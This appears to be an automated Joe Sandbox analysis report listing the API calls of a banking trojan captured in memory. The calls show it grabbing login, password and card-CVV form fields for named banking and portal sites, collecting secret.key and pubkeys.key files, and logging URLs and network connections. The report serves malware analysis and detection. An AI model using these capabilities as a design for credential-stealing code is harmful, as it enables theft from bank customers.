                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E435E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E4365
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 012E439D
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 012E43B0
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,?,TCP%s:%d%s:%d%s,00000000), ref: 012E43C8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E43DA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E43DD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E43EA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E43ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E43F9
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E43FC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E4409
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E440C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(012E58F7,00000000,00000000,00000001), ref: 012E446E
                                                                                                                                                                                                              • LockFile.KERNEL32(012E58F7,00000000,00000000,00000001,00000000), ref: 012E447E
                                                                                                                                                                                                              • WriteFile.KERNEL32(012E58F7,00000000,00000001,00000000,00000000), ref: 012E448D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(012E58F7,012E58F7,00000000,00000001,00000000), ref: 012E449D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E44AC
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E44AF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E44BC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E44BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                              • API String ID: 2439004899-2402783461
                                                                                                                                                                                                              • Opcode ID: aded540899001f4814b5c69c7918cd439a2e658901053336824d2ff65c65854c
                                                                                                                                                                                                              • Instruction ID: 92203461de332930f8abc7bfa9fc045b72cc70fc2f9ec87cfcf4077822f9b034
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aded540899001f4814b5c69c7918cd439a2e658901053336824d2ff65c65854c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1A19471A00355ABEB30AFA59C4DFAF7FBCEB85711F548118F605E7284DA749604CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 01300830
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c11d), ref: 01300857
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01300895
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130089F
                                                                                                                                                                                                              • #680.SHELL32 ref: 013008A7
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013008B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013008C0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 013008FC
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0130090A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c11d,?,?), ref: 01300945
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0130097F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01300989
                                                                                                                                                                                                              • #680.SHELL32 ref: 01300991
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013009A0
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013009A7
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 013009D5
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01300A00
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000208), ref: 01300A4B
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,?,?), ref: 01300A65
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000208,?,?,secret.key,00000002,?,?,?), ref: 01300AA8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002,?,?,?), ref: 01300AC2
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,0132A5BC,00000002,?,?,?), ref: 01300AE7
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000208), ref: 01300B2A
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 01300B44
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 01300B69
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 01300BA1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 01300BA4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 01300BB0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 01300BB3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 01300BC0
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 01300BE6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 01300C08
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 01300C23
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 01300C2E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?), ref: 01300C39
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 01300C40
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 01300C50
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01300C62
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 01300C8F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 01300C92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 01300C9F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 01300CA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 01300CAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 01300CAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 01300CBF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 01300CC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$#680AttributesBackslashFolderHandleMakeMutexSystem$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                              • String ID: 61c5c11d$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?), ref: 012F89F2
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?,?,?), ref: 012F8A0F
                                                                                                                                                                                                                • Part of subcall function 012F4170: GetProcessHeap.KERNEL32(00000008,00000016,7597EA50,01339B58,01304A9E), ref: 012F4181
                                                                                                                                                                                                                • Part of subcall function 012F4170: HeapAlloc.KERNEL32(00000000), ref: 012F4188
                                                                                                                                                                                                                • Part of subcall function 012F4170: memset.MSVCRT(00000000,00000000,00000016), ref: 012F4198
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?), ref: 012F8A35
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE433
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE441
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE44D
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE45B
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE467
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE479
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: strstr.MSVCRT(00000000,&domain=letitbit.net&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE48F
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: strstr.MSVCRT(00000000,01329A24,?,012F8A44,?,?,?,?,?), ref: 012FE4A2
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?), ref: 012FE50B
                                                                                                                                                                                                                • Part of subcall function 013044A0: strstr.MSVCRT(00000000,login.yota.ru,?,00000000), ref: 013044DC
                                                                                                                                                                                                                • Part of subcall function 013044A0: strstr.MSVCRT(00000000,IDToken1=), ref: 013044EF
                                                                                                                                                                                                                • Part of subcall function 013044A0: strstr.MSVCRT(00000000,IDToken2=), ref: 01304502
                                                                                                                                                                                                                • Part of subcall function 013044A0: PathAddBackslashA.SHLWAPI(0133D2A0), ref: 01304528
                                                                                                                                                                                                                • Part of subcall function 013044A0: PathAddBackslashA.SHLWAPI(0133D2A0), ref: 01304562
                                                                                                                                                                                                                • Part of subcall function 013044A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 013045CD
                                                                                                                                                                                                                • Part of subcall function 013044A0: GetLastError.KERNEL32 ref: 013045D7
                                                                                                                                                                                                                • Part of subcall function 01301A60: strstr.MSVCRT(00000000,&txtSubId=,00000000,?), ref: 01301A83
                                                                                                                                                                                                                • Part of subcall function 01301A60: strstr.MSVCRT(00000000,&txtPin=), ref: 01301A92
                                                                                                                                                                                                                • Part of subcall function 01301A60: strstr.MSVCRT(00000000,ebank.laiki.com), ref: 01301AA1
                                                                                                                                                                                                                • Part of subcall function 01301A60: PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301ACD
                                                                                                                                                                                                                • Part of subcall function 01301A60: PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301B03
                                                                                                                                                                                                                • Part of subcall function 01301A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 01301B6C
                                                                                                                                                                                                                • Part of subcall function 01301A60: GetLastError.KERNEL32 ref: 01301B76
                                                                                                                                                                                                                • Part of subcall function 01301A60: #680.SHELL32 ref: 01301B7E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?), ref: 012F8A5C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?), ref: 012F8A6C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD,?,?,?,?,?), ref: 012F8A9D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61C5C0AD,?,?,?,?,?), ref: 012F8AAB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8AB8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD,?,?,?,?,?), ref: 012F8ABF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?), ref: 012F8B2E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f,?,?,?,?,?), ref: 012F8B5D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61c5c09f,?,?,?,?,?), ref: 012F8B6B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8B78
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f,?,?,?,?,?), ref: 012F8B7F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?), ref: 012F8BF3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?), ref: 012F8C03
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?), ref: 012F8C13
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C079,?,?,?,?,?), ref: 012F8C3D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61C5C079,?,?,?,?,?), ref: 012F8C4B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8C58
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C079,?,?,?,?,?), ref: 012F8C5F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?), ref: 012F8CCF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3,?,?,?,?,?), ref: 012F8CFD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61c5c1a3,?,?,?,?,?), ref: 012F8D0B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8D18
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3,?,?,?,?,?), ref: 012F8D1F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?), ref: 012F8D93
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125,?,?,?,?,?), ref: 012F8DBD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61c5c125,?,?,?,?,?), ref: 012F8DCB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125,?,?,?,?,?), ref: 012F8DD6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?), ref: 012F8E43
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94,?,?,?,?,?), ref: 012F8E6D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,0133CF94,?,?,?,?,?), ref: 012F8E7B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94,?,?,?,?,?), ref: 012F8E86
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303570,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 012F8EE8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?), ref: 012F8F00
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?), ref: 012F8F11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$#680AllocCloseInformationReadThreadmemcpy
                                                                                                                                                                                                              • String ID: &LOGIN_AUTHORIZATION_CODE=$61C5C079$61C5C0AD$61c5c09f$61c5c125$61c5c1a3$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 012F0981
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0984
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110), ref: 012F099E
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 012F09BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F09DF
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F09E2
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F09F7
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012F0A0D
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 012F0A29
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 012F0A3C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 012F0A4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0A4F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110), ref: 012F0A6A
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 012F0A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F0AC9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0ACC
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F0AE0
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F0AF0
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012F0AFE
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,?,[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s,?,?,?,?,00000000), ref: 012F0B40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F0B6C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0B6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F0B7C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0B7F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0B8B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0B8E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0B9B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0B9E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0BB4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0BB7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0BC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0BC7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 012F0BE6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0BEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0BF8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0BFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0C07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0C0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0C13
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                              • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                              • API String ID: 1808236364-2343086565
                                                                                                                                                                                                              • Opcode ID: 0e9c438d9f1202fa3c94f24d6f1f1c4056c199b1e6fad88c8a8267abfc141963
                                                                                                                                                                                                              • Instruction ID: 6c96befba68f28e51f843cef26dc674de01e8beda17081a33452c58b34463e5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9c438d9f1202fa3c94f24d6f1f1c4056c199b1e6fad88c8a8267abfc141963
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94A1B57190021AAFEB21EF68DC49FEFBB79EF54714F148158FB04A7281DA709A01C7A4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 012F2AAC
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012F2AC5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2ACC
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012F2B0B
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012F2B25
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2B2F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 012F2BA8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012F2BCE
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F2BED
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,0132FB50,00000000), ref: 012F2C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 012F2C2A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012F2C35
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 012F2C52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F2C84
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F2C8B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F2C9F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 012F2D40
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 012F2D51
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 012F2D61
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 012F2D72
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F2D7B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F2D82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F2D8F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F2D96
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0132FB50), ref: 012F2DB1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F2DB4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0132FB50), ref: 012F2DC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F2DC4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F2DE1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F2DF3
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB50), ref: 012F2DFE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F2E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012F2E48
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 012F2E5B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012F2E68
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                              • String ID: 9E2B3E4Da$9e2b3e8fa$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                              • API String ID: 255608459-2845588016
                                                                                                                                                                                                              • Opcode ID: 0d8e45bad36854f2b526f0c1d5d71f58edc32e03b0873d3e095d0441b8ee5346
                                                                                                                                                                                                              • Instruction ID: 2c075c0cfbd1f6b01fc38ccf12ee475489eeea0e252cba1b4d59767189574318
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d8e45bad36854f2b526f0c1d5d71f58edc32e03b0873d3e095d0441b8ee5346
